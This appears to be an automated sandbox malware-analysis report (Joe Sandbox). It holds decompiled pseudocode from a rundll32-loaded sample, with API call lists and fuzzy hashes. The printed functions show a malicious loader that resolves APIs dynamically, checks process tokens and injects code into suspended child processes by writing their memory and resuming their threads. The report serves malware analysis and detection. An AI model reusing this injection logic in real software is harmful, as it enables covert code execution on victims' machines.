              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
            • Process32First.KERNEL32(00000000,?), ref: 0346BB44
            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0346BB84
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
            • String ID:
            • API String ID: 3344077921-0
            • Opcode ID: db78fabe6a2d27744d592df5948552ace1f9261dcbcdd091390b2719c2ba34cf
            • Instruction ID: b0c5c9e6798486d6f1e2f0a80aedcedc468fa8351b2a80302670a020a1126e55
            • Opcode Fuzzy Hash: db78fabe6a2d27744d592df5948552ace1f9261dcbcdd091390b2719c2ba34cf
            • Instruction Fuzzy Hash: 461186722042419FC310EF69EC49E6B77ECFF89660F19066EF564DB288EB20D9048766
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            Graph image not preserved. Basic blocks: 234 346c986-346c9a6 (GetTokenInformation); 235 346c9ec; 236 346c9a8-346c9b1 (GetLastError); 237 346c9ee-346c9f2; 238 346c9b3-346c9c3 (call 3468dc9); 241 346c9c5-346c9c7; 242 346c9c9-346c9dc (GetTokenInformation); 243 346c9de-346c9ea (call 3468ddf). Edges: 234->235, 234->236, 235->237, 236->235, 236->238, 238->241, 238->242, 241->237, 242->235, 242->243, 243->241.
            C-Code - Quality: 86%
            			E0346C986(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
            				long _v8;
            				void* _v12;
            				void* _t12;
            				void* _t20;
            				void* _t22;
            				union _TOKEN_INFORMATION_CLASS _t28;
            				void* _t31;
            
            				_push(_t22);
            				_push(_t22);
            				_t31 = 0;
            				_t28 = __edx;
            				_t20 = _t22;
            				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
            					L6:
            					_t12 = _t31;
            				} else {
            					_t31 = E03468DC9(_v8);
            					_v12 = _t31;
            					if(_t31 != 0) {
            						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
            							goto L6;
            						} else {
            							E03468DDF( &_v12, _t16);
            							goto L3;
            						}
            					} else {
            						L3:
            						_t12 = 0;
            					}
            				}
            				return _t12;
            			}

            APIs
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,03460000,00000000,00000000,?,0346CA07,00000000,00000000,?,0346CA30), ref: 0346C9A1
            • GetLastError.KERNEL32(?,0346CA07,00000000,00000000,?,0346CA30,00001644,?,0346E053), ref: 0346C9A8
              • Part of subcall function 03468DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03469793,00000100,?,0346661B), ref: 03468DD7
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0346CA07,00000000,00000000,?,0346CA30,00001644,?,0346E053), ref: 0346C9D7
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: InformationToken$AllocateErrorHeapLast
            • String ID:
            • API String ID: 2499131667-0
            • Opcode ID: 071714050bfe48f8f9ea358667b3aa2433bf32ad4fd1f0261b58554d256768fe
            • Instruction ID: 6c0a9c6ced5d948ea63d178e211fe78082f5efeb18387d5fac7d8ba12e4bdcfb
            • Opcode Fuzzy Hash: 071714050bfe48f8f9ea358667b3aa2433bf32ad4fd1f0261b58554d256768fe
            • Instruction Fuzzy Hash: D901A2B6600214FF8B20EFA6DC89D9B7FECEF496A07110466F445EA201E730DD048BB5
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            Graph image not preserved. Single basic block: 246 346be10-346be5f (call 3468f63 twice, CreateProcessW).
            C-Code - Quality: 79%
            			E0346BE10(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
            				struct _STARTUPINFOW _v72;
            				signed int _t11;
            
            				E03468F63(__edx, 0, 0x10);
            				E03468F63( &_v72, 0, 0x44);
            				_v72.cb = 0x44;
            				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
            				asm("sbb eax, eax");
            				return  ~( ~_t11) - 1;
            			}

            APIs
              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0346BE52
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CreateProcessmemset
            • String ID: D
            • API String ID: 2296119082-2746444292
            • Opcode ID: 32e5d098f3cc605913e15fa3736932d8c965f88bfc2a8ff09b4091f26ae4d7e5
            • Instruction ID: 9263db6bf822fc2f0a455de95e37c07aaa254c181bf3e1cee68dc649d6111e14
            • Opcode Fuzzy Hash: 32e5d098f3cc605913e15fa3736932d8c965f88bfc2a8ff09b4091f26ae4d7e5
            • Instruction Fuzzy Hash: B9F065F16402087EF720EA65CC0AFBF37ACDB85710F500125BB05EF1C0E6A0AD0582B5
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            Graph image not preserved. Basic blocks: 251 346d889-346d8a9 (call 346d7cd); 254 346d8af-346d8ce (call 346b6e3); 255 346d9da-346d9dd; 258 346d8d4-346d8d6; 259 346d9ca-346d9d9 (call 3468ddf); 260 346d8dc-346d8de; 261 346d9b8-346d9c8 (call 3468ddf); 263 346d8e1-346d8e3; 266 346d9a6-346d9b2; 267 346d8e9-346d908 (call 3468f63, call 346be10); 273 346d96a-346d96e; 274 346d90a-346d91d (call 346d9de); 275 346d970-346d972; 276 346d999-346d9a0; 278 346d974-346d97a; 279 346d983-346d993; 281 346d91f-346d937; 284 346d967; 285 346d939-346d94e (GetLastError, call 346dadc); 288 346d963-346d964 (FindCloseChangeNotification); 289 346d950-346d95b; 291 346d95e; 292 346d95d. Edges: 251->254, 251->255, 254->258, 254->259, 258->260, 258->261, 259->255, 260->263, 261->259, 263->266, 263->267, 266->258, 266->261, 267->273, 267->274, 273->275, 273->276, 274->273, 274->281, 275->278, 275->279, 276->263, 276->266, 278->279, 279->276, 281->284, 281->285, 284->273, 285->288, 285->289, 288->284, 289->291, 289->292, 291->288, 292->291.
            C-Code - Quality: 96%
            			E0346D889(intOrPtr __edx) {
            				intOrPtr _v8;
            				signed int _v12;
            				signed int _v16;
            				intOrPtr _v20;
            				char _v24;
            				intOrPtr _v36;
            				char _v40;
            				char _v80;
            				char _t37;
            				intOrPtr _t38;
            				signed int _t45;
            				void* _t49;
            				intOrPtr _t50;
            				intOrPtr _t52;
            				intOrPtr _t54;
            				void* _t56;
            				intOrPtr _t59;
            				void* _t62;
            				intOrPtr _t63;
            				signed int _t67;
            				intOrPtr _t69;
            				void* _t70;
            				intOrPtr _t86;
            				char _t87;
            				void* _t88;
            
            				_v16 = _v16 & 0x00000000;
            				_v20 = __edx;
            				_t86 = 0;
            				_t37 = E0346D7CD( &_v16, __edx);
            				_t87 = _t37;
            				_v24 = _t87;
            				_t89 = _t87;
            				if(_t87 == 0) {
            					return _t37;
            				}
            				_t38 =  *0x347f8d4; // 0x50ffc00
            				_t7 = _t38 + 0xac; // 0xa4858137
            				E0346B6E3( &_v80,  *_t7 + 7, _t89);
            				_v12 = _v12 & 0;
            				_t67 = _v16;
            				if(_t67 == 0) {
            					L21:
            					E03468DDF( &_v24, 0);
            					return _t86;
            				}
            				while(_t86 == 0) {
            					_t69 = 0;
            					_v8 = 0;
            					while(_t86 == 0) {
            						E03468F63( &_v40, _t86, 0x10);
            						_t88 = _t88 + 0xc;
            						_t49 = E0346BE10( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
            						_t94 = _t49;
            						if(_t49 >= 0) {
            							_t56 = E0346D9DE(E03466297,  &_v40, _t94, _v20); // executed
            							if(_t56 != 0) {
            								_t59 =  *0x347f8d0; // 0x50ff8c0
            								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
            								if(_t70 != 0) {
            									GetLastError();
            									_t62 = E0346DADC( &_v40);
            									_t63 =  *0x347f8d0; // 0x50ff8c0
            									if(_t62 != 0) {
            										_push(0xea60);
            										_push(_t70);
            										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
            											_t86 = _t86 + 1;
            										}
            										_t63 =  *0x347f8d0; // 0x50ff8c0
            									}
            									FindCloseChangeNotification(_t70);
            								}
            								_t69 = _v8;
            							}
            						}
            						if(_v40 != 0) {
            							if(_t86 == 0) {
            								_t54 =  *0x347f8d0; // 0x50ff8c0
            								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
            							}
            							_t50 =  *0x347f8d0; // 0x50ff8c0
            							 *((intOrPtr*)(_t50 + 0x30))(_v36);
            							_t52 =  *0x347f8d0; // 0x50ff8c0
            							 *((intOrPtr*)(_t52 + 0x30))(_v40);
            						}
            						_t69 = _t69 + 1;
            						_v8 = _t69;
            						if(_t69 < 2) {
            							continue;
            						} else {
            							break;
            						}
            					}
            					_t67 = _v16;
            					_t45 = _v12 + 1;
            					_v12 = _t45;
            					if(_t45 < _t67) {
            						continue;
            					} else {
            						break;
            					}
            					do {
            						goto L20;
            					} while (_t67 != 0);
            					goto L21;
            				}
            				L20:
            				E03468DDF(_t87, 0xfffffffe);
            				_t87 = _t87 + 4;
            				_t67 = _t67 - 1;
            			}

            APIs
              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
              • Part of subcall function 0346BE10: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0346BE52
              • Part of subcall function 0346D9DE: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0346DA40
              • Part of subcall function 0346D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0346DA89
              • Part of subcall function 0346D9DE: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0346DAA6
              • Part of subcall function 0346D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0346DAC7
            • GetLastError.KERNEL32(?,?,00000001), ref: 0346D939
              • Part of subcall function 0346DADC: ResumeThread.KERNELBASE(?,0346D947,?,?,00000001), ref: 0346DAE4
            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0346D964
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
            • String ID:
            • API String ID: 2212882986-0
            • Opcode ID: da7846e33d93cad28a9e797a020a9d9dd29b4684d20449383cd97c90ee8d0aca
            • Instruction ID: 056eb6c6314393e7d33561cad1405cbaf44eb7a9640154dec1b0b29f85e5fc7f
            • Opcode Fuzzy Hash: da7846e33d93cad28a9e797a020a9d9dd29b4684d20449383cd97c90ee8d0aca
            • Instruction Fuzzy Hash: AE418076F00209AFCB10EFA9C984E9EB7F9FF49210F15406AE915FF254D73099088B65
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 61%
            			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
            				long _v8;
            				intOrPtr _t15;
            				WCHAR* _t23;
            				long _t24;
            				void* _t28;
            				void* _t31;
            				intOrPtr _t36;
            				void* _t41;
            				void* _t48;
            				intOrPtr* _t49;
            
            				_push(__ecx);
            				if(_a8 != 1) {
            					__eflags = _a8;
            					if(_a8 != 0) {
            						L7:
            						__eflags = 1;
            						return 1;
            					}
            					_t15 =  *0x347f8d0; // 0x50ff8c0
            					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
            					L3:
            					return 0;
            				}
            				E03468DB4();
            				E03469787();
            				 *0x347f8e8 = _a4;
            				E03473D36(_a4);
            				 *_t49 = 0xf2e;
            				 *0x347f8d0 = E0346F0D9(0x347ca88, 0x138);
            				 *_t49 = 0xe8d;
            				_t23 = E03469F85(0x347ca88);
            				_pop(_t41);
            				_a8 = _t23;
            				_t24 = GetFileAttributesW(_t23); // executed
            				_push( &_a8);
            				if(_t24 == 0xffffffff) {
            					E03468D9A();
            					 *_t49 = 0x1f4;
            					_t28 = E0346FCDA(E0346109A(_t41));
            					_a8 = _t28;
            					__eflags = _t28;
            					if(_t28 != 0) {
            						_t48 = 0x54;
            						 *0x347f8e0 = E0346F0D9(0x347cbf0, _t48);
            						E0346647A(_t48, __eflags);
            						E03468DDF( &_a8, 0xfffffffe);
            						_t36 =  *0x347f8d0; // 0x50ff8c0
            						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x641);
            					}
            					_v8 = 0;
            					_t31 = CreateThread(0, 0, E034663A2, 0, 0,  &_v8);
            					 *0x347f8f4 = _t31;
            					__eflags = _t31;
            					if(_t31 == 0) {
            						goto L3;
            					} else {
            						goto L7;
            					}
            				}
            				E03468D9A();
            				goto L3;
            			}

            APIs
              • Part of subcall function 03468DB4: HeapCreate.KERNELBASE(00000000,00096000,00000000,03466616), ref: 03468DBD
              • Part of subcall function 0346F0D9: GetModuleHandleA.KERNEL32(00000000,?,?,?,0347CA88,?,0346663F,?), ref: 0346F0FB
            • GetFileAttributesW.KERNELBASE(00000000), ref: 03466655
            • CreateThread.KERNELBASE(00000000,00000000,034663A2,00000000,00000000,?), ref: 034666DC
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Create$AttributesFileHandleHeapModuleThread
            • String ID:
            • API String ID: 607385197-0
            • Opcode ID: e47bcd166e60a64c326c5430db0f3d95d1abee81c23bfb18dbac65b8aeeb7551
            • Instruction ID: d9f3967a2eed960e282b0216a62ec0b52a4b4b1dcdad273d0760e429388e9dc6
            • Opcode Fuzzy Hash: e47bcd166e60a64c326c5430db0f3d95d1abee81c23bfb18dbac65b8aeeb7551
            • Instruction Fuzzy Hash: C5212F75604305AFDB04FFB6E804A6E37E8AF44310F16852FE559DE294DB78C5448B2A
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            Graph image not preserved. Basic blocks: 329 346f0d9-346f0f9 (call 3469f6b); 332 346f103-346f108 (LoadLibraryA); 333 346f0fb-346f101 (GetModuleHandleA); 334 346f10a-346f10c; 335 346f10e-346f113 (call 346f08e); 336 346f11b-346f129 (call 3468d87); 339 346f118-346f119. Edges: 329->332, 329->333, 332->334, 333->334, 334->335, 334->336, 335->339, 339->336.
            C-Code - Quality: 47%
            			E0346F0D9(void* __ecx, void* __edx, intOrPtr _a4) {
            				char _v8;
            				char _t5;
            				struct HINSTANCE__* _t7;
            				void* _t10;
            				void* _t12;
            				void* _t22;
            				void* _t25;
            
            				_push(__ecx);
            				_t12 = __ecx;
            				_t22 = __edx;
            				_t5 = E03469F6B(_a4);
            				_t25 = 0;
            				_v8 = _t5;
            				_push(_t5);
            				if(_a4 != 0xf2e) {
            					_t7 = LoadLibraryA(); // executed
            				} else {
            					_t7 = GetModuleHandleA();
            				}
            				if(_t7 != 0) {
            					_t10 = E0346F08E(_t12, _t22, _t7); // executed
            					_t25 = _t10;
            				}
            				E03468D87( &_v8);
            				return _t25;
            			}

            APIs
            • GetModuleHandleA.KERNEL32(00000000,?,?,?,0347CA88,?,0346663F,?), ref: 0346F0FB
            • LoadLibraryA.KERNELBASE(00000000,?,?,?,0347CA88,?,0346663F,?), ref: 0346F108
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID:
            • API String ID: 4133054770-0
            • Opcode ID: d4ae5de34469c5d22a5fd732a95993a6fd62ee98f45d9e95d5095fa0c4ca18b5
            • Instruction ID: 4c17af39bc691b5d551df6a2dc8e775c3ccec4a8d83f91e9288fef382d42ac00
            • Opcode Fuzzy Hash: d4ae5de34469c5d22a5fd732a95993a6fd62ee98f45d9e95d5095fa0c4ca18b5
            • Instruction Fuzzy Hash: 4CF0A072300214AFC704EFAAE8448AAB3FDAF88291B14413FF402DF240DFB08D4587A5
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            Graph image not preserved. Basic blocks: 341 346ca5a-346ca79 (call 346c92f); 344 346cb14-346cb17; 345 346ca7f-346ca96 (call 346c986); 348 346caf6-346cb04 (FindCloseChangeNotification); 349 346ca98-346cab9; 350 346cb06-346cb11 (call 3468ddf); 351 346cb12; 355 346cabb-346cabd; 356 346cabf-346cac2; 357 346cae9-346caf4; 358 346cac5-346cad4; 361 346cae6-346cae8; 362 346cad6-346cae2; 363 346cae4. Edges: 341->344, 341->345, 345->348, 345->349, 348->350, 348->351, 349->348, 349->355, 350->351, 351->344, 355->356, 355->357, 356->358, 357->348, 358->361, 358->362, 361->357, 362->358, 362->363, 363->357.
            C-Code - Quality: 47%
            			E0346CA5A(void* __ecx, void* __esi) {
            				intOrPtr* _v8;
            				char _v12;
            				void* _v16;
            				char _v20;
            				char _v24;
            				short _v28;
            				char _v32;
            				void* _t20;
            				intOrPtr* _t21;
            				intOrPtr _t29;
            				intOrPtr _t31;
            				intOrPtr* _t33;
            				intOrPtr _t34;
            				char _t37;
            				union _TOKEN_INFORMATION_CLASS _t44;
            				char _t45;
            				intOrPtr* _t48;
            
            				_t37 = 0;
            				_v28 = 0x500;
            				_t45 = 0;
            				_v32 = 0;
            				_t20 = E0346C92F(__ecx);
            				_v16 = _t20;
            				if(_t20 != 0) {
            					_push( &_v24);
            					_t44 = 2;
            					_t21 = E0346C986(_t44); // executed
            					_t48 = _t21;
            					_v20 = _t48;
            					if(_t48 == 0) {
            						L10:
            						FindCloseChangeNotification(_v16);
            						if(_t48 != 0) {
            							E03468DDF( &_v20, _t37);
            						}
            						return _t45;
            					}
            					_push( &_v12);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0x220);
            					_push(0x20);
            					_push(2);
            					_push( &_v32);
            					_t29 =  *0x347f8d8; // 0x50ffab0
            					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
            						goto L10;
            					}
            					if( *_t48 <= 0) {
            						L9:
            						_t31 =  *0x347f8d8; // 0x50ffab0
            						 *((intOrPtr*)(_t31 + 0x10))(_v12);
            						_t37 = 0;
            						goto L10;
            					}
            					_t9 = _t48 + 4; // 0x4
            					_t33 = _t9;
            					_v8 = _t33;
            					while(1) {
            						_push(_v12);
            						_push( *_t33);
            						_t34 =  *0x347f8d8; // 0x50ffab0
            						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
            							break;
            						}
            						_t37 = _t37 + 1;
            						_t33 = _v8 + 8;
            						_v8 = _t33;
            						if(_t37 <  *_t48) {
            							continue;
            						}
            						goto L9;
            					}
            					_t45 = 1;
            					goto L9;
            				}
            				return _t20;
            			}

            APIs
              • Part of subcall function 0346C92F: GetCurrentThread.KERNEL32 ref: 0346C942
              • Part of subcall function 0346C92F: OpenThreadToken.ADVAPI32(00000000,?,?,0346CA74,00000000,03460000), ref: 0346C949
              • Part of subcall function 0346C92F: GetLastError.KERNEL32(?,?,0346CA74,00000000,03460000), ref: 0346C950
              • Part of subcall function 0346C92F: OpenProcessToken.ADVAPI32(00000000,?,?,0346CA74,00000000,03460000), ref: 0346C975
              • Part of subcall function 0346C986: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,03460000,00000000,00000000,?,0346CA07,00000000,00000000,?,0346CA30), ref: 0346C9A1
              • Part of subcall function 0346C986: GetLastError.KERNEL32(?,0346CA07,00000000,00000000,?,0346CA30,00001644,?,0346E053), ref: 0346C9A8
            • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,03460000), ref: 0346CAFE
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
            • String ID:
            • API String ID: 1806447117-0
            • Opcode ID: e6ce40138d7073575f29f07de60f60ae4c433665b20030a31fa5383b6ed86916
            • Instruction ID: fe1dbd3850d3535b3f820e6ebc51c9c27d30a4bc8fcfebb7739232e48b5f1369
            • Opcode Fuzzy Hash: e6ce40138d7073575f29f07de60f60ae4c433665b20030a31fa5383b6ed86916
            • Instruction Fuzzy Hash: FC217C32A00209AFCB10EFA9DCC4AAFF7F8FF48600B14406AE541EB251E7309D059B55
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 100%
            			E034663A2(void* __fp0) {
            				void* __ecx;
            				intOrPtr _t13;
            				intOrPtr _t14;
            				signed int _t16;
            				intOrPtr _t17;
            				intOrPtr _t20;
            				void* _t25;
            				void* _t27;
            
            				_t32 = __fp0;
            				E0346651E();
            				GetOEMCP();
            				_t13 = E0346DFC2(__fp0); // executed
            				 *0x347f8d4 = _t13;
            				if(_t13 != 0) {
            					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
            					_t14 =  *0x347f8d4; // 0x50ffc00
            					_t2 = _t14 + 0x224; // 0x3460000
            					E03473C36( *_t2);
            					_t26 =  *0x347f8d4; // 0x50ffc00
            					_t25 = _t27;
            					__eflags =  *(_t26 + 0x1898) & 0x00010000;
            					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
            						_t7 = _t26 + 0x224; // 0x3460000, executed
            						_t26 =  *_t7;
            						_t16 = E0346D889( *_t7); // executed
            						__eflags = _t16;
            						_t17 =  *0x347f8d4; // 0x50ffc00
            						if(_t16 != 0) {
            							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
            							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
            								L10:
            								__eflags = 0;
            								return 0;
            							}
            							L9:
            							E03463597();
            							goto L10;
            						}
            						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
            						L6:
            						_t20 =  *0x347f8d4; // 0x50ffc00
            						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
            						if(__eflags == 0) {
            							goto L9;
            						}
            						E034661E8(_t25, _t26, __eflags, _t32);
            						goto L10;
            					}
            					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
            					goto L6;
            				}
            				return _t13 + 1;
            			}

            APIs
            • GetOEMCP.KERNEL32 ref: 034663A7
              • Part of subcall function 0346DFC2: GetCurrentProcessId.KERNEL32 ref: 0346DFE9
              • Part of subcall function 0346DFC2: GetLastError.KERNEL32 ref: 0346E0E3
              • Part of subcall function 0346DFC2: GetSystemMetrics.USER32(00001000), ref: 0346E0F3
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CurrentErrorLastMetricsProcessSystem
            • String ID:
            • API String ID: 1196160345-0
            • Opcode ID: 6fc3314a8dc6a6d4a580e36b2199514fa486c8cba8eb165a104f329a9d89e210
            • Instruction ID: 7612e323bb93f6745c37f366bdc11c1ebaa393e68dddfa8bbff91c85f42b0d24
            • Opcode Fuzzy Hash: 6fc3314a8dc6a6d4a580e36b2199514fa486c8cba8eb165a104f329a9d89e210
            • Instruction Fuzzy Hash: 30012C796042928FC214FF69E5086A677E8EF49210F1F01BBE0449E115C7344455CB9B
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0346CA0A(void* __ecx) {
            				signed int _v8;
            				intOrPtr _t12;
            				void* _t13;
            				void* _t14;
            				void* _t17;
            				intOrPtr _t18;
            				void* _t23;
            
            				_v8 = _v8 & 0x00000000;
            				_t12 =  *0x347f8d8; // 0x50ffab0
            				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
            				if(_t13 != 0) {
            					_t14 = E0346C9F3(); // executed
            					_t23 = _t14;
            					if(_t23 != 0) {
            						FindCloseChangeNotification(_v8);
            						_t17 = _t23;
            					} else {
            						if(_v8 != _t14) {
            							_t18 =  *0x347f8d0; // 0x50ff8c0
            							 *((intOrPtr*)(_t18 + 0x30))(_v8);
            						}
            						_t17 = 0;
            					}
            					return _t17;
            				} else {
            					return _t13;
            				}
            			}

            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bc85074d94ef5c3a652cf92ae8df896d5684a371bb60ff9658bc33828248ce38
            • Instruction ID: c68055bf7ad9cc9429659de1c2dbac5b2a212a8d180cfac376ce689b8f942cda
            • Opcode Fuzzy Hash: bc85074d94ef5c3a652cf92ae8df896d5684a371bb60ff9658bc33828248ce38
            • Instruction Fuzzy Hash: 0DF01731A10214EFCB10EBA8C985A9E73E8FF08245F0540A5E541EB250D774DE04DB95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E03466438() {
            				intOrPtr _t3;
            
            				_t3 =  *0x347f8d0; // 0x50ff8c0
            				 *((intOrPtr*)(_t3 + 0x2c))( *0x347f8f4, 0xffffffff);
            				ExitProcess(0);
            			}

            APIs
            • ExitProcess.KERNEL32(00000000), ref: 0346644F
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: 6845f78150d981f3ade8e6792fe2fabd27a764f57f6e30d8c36b769aa6903b1b
            • Instruction ID: 5c8f7f13dcd26599ae5897843cef8cf89485a52063c546bf2a46e45d818dc0ca
            • Opcode Fuzzy Hash: 6845f78150d981f3ade8e6792fe2fabd27a764f57f6e30d8c36b769aa6903b1b
            • Instruction Fuzzy Hash: 89C002712181519FC740BB64D949F1437E0BF0C322F1A86A5F529AE1EDCB2094289B00
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E03468DC9(long _a4) {
            				void* _t2;
            
            				_t2 = RtlAllocateHeap( *0x347f9b8, 8, _a4); // executed
            				return _t2;
            			}

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,?,03469793,00000100,?,0346661B), ref: 03468DD7
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 2973a14fcd905f5d1d5cb28a5f00a8107de92cdee4637c3cb9637df70d70bf6b
            • Instruction ID: 5a21460218081e35e25e7a26fcaaf05002b4332e67800d729e9377218556cdec
            • Opcode Fuzzy Hash: 2973a14fcd905f5d1d5cb28a5f00a8107de92cdee4637c3cb9637df70d70bf6b
            • Instruction Fuzzy Hash: EAB0923A090208BBCF512A81EC05A847FA9FB08651F004010F6086C0648B6364659B80
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E0346DADC(void* __ecx) {
            				signed int _t4;
            
            				_t4 = ResumeThread( *(__ecx + 4));
            				asm("sbb eax, eax");
            				return  ~_t4 & 0x00000001;
            			}

            APIs
            • ResumeThread.KERNELBASE(?,0346D947,?,?,00000001), ref: 0346DAE4
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: 14d0d73895b0cf1675e30319ee5a136cba5af4d624810a986250008a8b356604
            • Instruction ID: cb6bceb91d50815a1566ee617eee34f54139d284fd9c0417b3784dec1ae496eb
            • Opcode Fuzzy Hash: 14d0d73895b0cf1675e30319ee5a136cba5af4d624810a986250008a8b356604
            • Instruction Fuzzy Hash: 84B092322A00019BCB006B74D80A9A03BE0BB5A606B99C2E4A015CA065C32AC4598B40
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E03468DB4() {
            				void* _t1;
